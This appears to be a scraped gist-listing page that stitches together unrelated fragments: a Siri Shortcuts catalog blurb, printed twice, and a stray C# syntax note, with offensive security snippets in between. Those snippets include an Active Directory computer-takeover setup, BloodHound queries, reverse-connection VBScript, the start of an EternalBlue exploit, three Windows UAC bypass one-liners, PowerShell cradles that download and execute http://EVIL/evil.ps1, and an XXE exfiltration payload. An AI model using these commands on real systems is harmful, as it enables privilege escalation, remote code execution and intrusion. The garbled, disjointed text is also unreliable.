Hello and welcome to my Shortcuts Catalog!
This is a public resource designed to help people get started with Siri Shortcuts and the Shortcuts app.
It’s made up of the Shortcuts Library, a collection of over 125+ shortcuts grouped into folders, and the Action Directory, a documentation of 125+ of the actions in the Shortcuts app used to build shortcuts.
Enjoy!
Hello and welcome to my Shortcuts Catalog!
This is a public resource designed to help people get started with Siri Shortcuts and the Shortcuts app.
It’s made up of the Shortcuts Library, a collection of over 125+ shortcuts grouped into folders, and the Action Directory, a documentation of 125+ of the actions in the Shortcuts app used to build shortcuts.
Enjoy!
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
| MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer | |
| RETURN u.name | |
| That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership | |
| --------------- | |
| MATCH | |
| (U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer) | |
| WITH | |
| U.name as n, |
| Call X() | |
| End Function | |
| Dim RHOST: RHOST = "x.x.x.x" | |
| Dim RPORT: RPORT = "8999" | |
| Function Base64ToStream(b) | |
| Dim enc, length, ba, transform, ms | |
| Set enc = CreateObject("System.Text.ASCIIEncoding") | |
| length = enc.GetByteCount_2(b) |
| #!/usr/bin/python | |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| from impacket import smb, ntlm | |
| from struct import pack | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
| **UAC bypass for Win10:** | |
| reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f | |
| **UAC bypass for Win10:** | |
| reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f | |
| **UAC bypass for 7/8/10:** | |
| reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f |
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
Single-line comments are started with //. Multi-line comments are started with /* and ended with */.
C# uses braces ({ and }) instead of indentation to organize code into blocks.
If a block is a single line, the braces can be omitted. For example,